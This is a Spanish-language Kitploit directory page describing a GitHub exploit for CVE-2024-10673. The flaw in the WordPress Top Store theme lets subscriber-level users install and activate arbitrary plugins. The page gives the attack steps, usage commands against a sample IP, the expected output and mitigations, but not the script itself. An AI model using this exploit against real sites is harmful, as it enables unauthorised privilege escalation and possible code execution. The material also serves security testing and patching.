Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-10673 — Top Store <= 1.5.4 - Autenticado (Suscriptor+) Instalación/Activación Arbitraria de Plugins | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2024-10673
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubnxploited/cve-2024-10673

CVE-2024-10673

Top Store <= 1.5.4 - Autenticado (Suscriptor+) Instalación/Activación Arbitraria de Plugins

Ver Repositorio
11hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔥 Resumen

Este script explota CVE-2024-10673, una vulnerabilidad crítica encontrada en el tema Top Store de WordPress (<= 1.5.4). El fallo permite a usuarios autenticados con acceso de nivel suscriptor o superior instalar y activar plugins arbitrarios a través de solicitudes AJAX no protegidas.

⚠️ Gravedad e Impacto

  • Instalación de plugins sin autenticación: Los atacantes con privilegios de suscriptor pueden instalar plugins sin aprobación de administrador.
  • Posibilidad de Ejecución Remota de Código (RCE): Si se instala un plugin malicioso, los atacantes pueden ejecutar código arbitrario.
  • Escalada de Privilegios: Los atacantes pueden instalar plugins que les concedan acceso administrativo.

🛠️ Características de Este Exploit

  • Automatiza el ataque extrayendo el nonce requerido de forma dinámica.
  • Permite seleccionar el plugin (los usuarios pueden especificar qué plugin instalar y activar).
  • Soporta respuestas en formato JSON para un registro estructurado.
  • Maneja errores de forma elegante, asegurando una ejecución robusta.

⚡ Cómo Funciona el Exploit

  1. Iniciar sesión en WordPress usando credenciales válidas.
  2. Extraer el nonce AJAX de themes.php?page=thunk_started.
  3. Enviar una solicitud AJAX para instalar un plugin (por defecto: hunk-companion o un plugin definido por el usuario).
  4. Enviar otra solicitud para activar el plugin.
  5. Mostrar respuestas JSON indicando éxito o fallo.

🚀 Uso

root@kitploit:~
usage: u.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]

Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password
  -pl PLUGIN, --plugin PLUGIN
                        Plugin slug to install and activate (default: hunk-companion)

Ejemplos

  • Instalar y activar el plugin por defecto (hunk-companion):
    root@kitploit:~
    python exploit.py -u http://192.168.100.74:888/wordpress -un admin -p admin
    
  • Instalar y activar un plugin específico (woocommerce):
    root@kitploit:~
    python CVE-2024-10673.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl woocommerce
    

📝 Salida Esperada

root@kitploit:~
{"Logged in successfully"}
{"Fetching nonce value..."}
{"Nonce extracted": "abc123"}
{"Installing plugin: woocommerce..."}
{"Plugin woocommerce installed successfully"}
{"Activating plugin: woocommerce..."}
{"Plugin woocommerce activated successfully"}
{"Exploit completed successfully!"}

🔒 Mitigación

Para proteger tu sitio WordPress:

  • Actualizar a una versión parcheada del tema Top Store.
  • Restringir los permisos de los suscriptores para evitar accesos innecesarios.
  • Monitorear los plugins instalados en busca de cambios no autorizados.
  • Deshabilitar la instalación de plugins para no administradores.

⚠️ Descargo de Responsabilidad

Este script es solo para fines educativos y de investigación en seguridad. El uso no autorizado contra sistemas que no poseas o para los que no tengas permiso explícito de prueba es ilegal. ¡Úsalo de forma responsable!

Por: Khaled Alenazi (Nxploit)

Descargar herramienta